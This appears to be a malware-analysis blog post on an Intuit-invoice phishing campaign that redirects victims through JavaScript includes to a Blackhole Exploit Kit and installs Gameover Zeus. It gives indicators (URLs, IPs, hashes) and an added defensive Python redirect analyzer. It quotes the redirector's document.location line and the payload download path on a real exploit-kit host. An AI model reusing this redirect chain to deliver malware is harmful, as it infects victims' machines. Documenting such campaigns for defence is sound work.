‘Download your intuit.com invoice’ installing Gameover Zeus

Subject: Dowload your Intuit.com invoice.
URL: hxxp://randkawciemno.co[.]uk/yGnRR231/index.html

Download your intuit.com invoice.
The text ‘Submit your feedback here’ contains a hyperlink to the URL shown above, which was hosted at IP address 200.98.246.235. The page contains no content other than five external JavaScript includes:

joseduranv[.]com /CusMduaN/js.js
primeenglish.com[.]hk /nEkdjYbc/js.js
sarasontv.co[.]uk /cq0gC8Qy/js.js
sviesa[.]org /x1qvg02X/js.js
himalyanacoustics[.]com /4oca5sVi/js.js
These JavaScript redirectors contain the following document.location script, which sends victims to a Blackhole Exploit Kit at 173.224.71.132:

document.location='hxxp://173.224.71.132:8080/showthread.php?t=73a07bcb51f4be71';
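The landing-page-to-redirector chain described above can be checked automatically. The following is an added example, not code from the original post: it extracts the external script includes from a landing page, pulls any document.location assignment out of each script body, and scores the redirect target with simple heuristics (IP-literal host, non-standard port, a single hex-token query such as the one seen here). The HTML and js.js bodies are constructed samples modelled on this post, with the hxxp defanging removed so the URLs parse; the fetch callback is injected so the analysis runs offline.

```python
import re
from urllib.parse import urlparse

# Constructed sample landing page modelled on the post: no content, only
# five external script includes (the five hosts listed in the post).
LANDING_PAGE = """<html><body>
<script src="http://joseduranv.com/CusMduaN/js.js"></script>
<script src="http://primeenglish.com.hk/nEkdjYbc/js.js"></script>
<script src="http://sarasontv.co.uk/cq0gC8Qy/js.js"></script>
<script src="http://sviesa.org/x1qvg02X/js.js"></script>
<script src="http://himalyanacoustics.com/4oca5sVi/js.js"></script>
</body></html>"""

# Constructed body of one js.js redirector, as quoted in the post (refanged).
REDIRECTOR_JS = "document.location='http://173.224.71.132:8080/showthread.php?t=73a07bcb51f4be71';"

SCRIPT_SRC_RE = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
LOCATION_RE = re.compile(
    r'(?:document|window)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)

def extract_script_srcs(html):
    """Return the external script URLs a landing page loads."""
    return SCRIPT_SRC_RE.findall(html)

def extract_redirects(js):
    """Return URLs assigned to document.location / window.location in a script body."""
    return LOCATION_RE.findall(js)

def redirect_indicators(url):
    """Score a redirect target; returns the list of heuristic flags it trips."""
    u = urlparse(url)
    flags = []
    if re.fullmatch(r'\d{1,3}(?:\.\d{1,3}){3}', u.hostname or ''):
        flags.append('ip-literal-host')
    if u.port not in (None, 80, 443):
        flags.append('nonstandard-port')
    # Exploit-kit style: .php path with a single short key and 16 hex chars.
    if u.path.endswith('.php') and re.fullmatch(r'[a-z]=[0-9a-f]{16}', u.query):
        flags.append('single-hex-token-query')
    return flags

def analyze_landing_page(html, fetch):
    """fetch(url) -> script body (injected, so this runs offline).
    Returns (script_url, redirect_target, flags) for every redirect found."""
    findings = []
    for src in extract_script_srcs(html):
        for target in extract_redirects(fetch(src)):
            findings.append((src, target, redirect_indicators(target)))
    return findings
```

In a real triage the fetch callback would be a sandboxed HTTP client and the flagged targets would be fed into proxy/DNS block lists.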

It downloads the Gameover Zeus installer from the following location:

173.224.71.132:8080 /q.php?f=14095&e=2

File: about.exe
MD5: edb02865d8a68d8e523bf0045d1ca90f
Size: 297,472 bytes

This Gameover variant is detected by 34 of 43 AV vendors on VirusTotal. It then installs Zeus in %APPDATA%, which had the following properties:

File: yqda.exe
MD5: a209653865219e53f29ec3d5f3afb5ca
Size: 297,472 bytes
Other: This file is digitally signed by ‘123f4123’
Company Name: 2q3wet Corporation
File Description: Windows TaskManager
Internal Name: taskmgr
Legal Copyright: Copyright (C) 2q3wet Corp. 1991-1999
Original Filename: taskmgr.exe
Product Name: 2q3wet(R) Windows (R) 2000 Operating System
Timestamp: 2012:03:04 15:01:05+01:00
This Gameover variant is detected by 27 of 43 AV vendors on VirusTotal.

The Gameover variant had a bot id of “mmz4” and a cid of “5555”. Judging by the timestamp of the installed variant and the “mmz4” bot id, it looks to be an old build. Because it was an old build, it could not reach its drop zone and therefore fell back to the drop zone domains generated by its DGA.
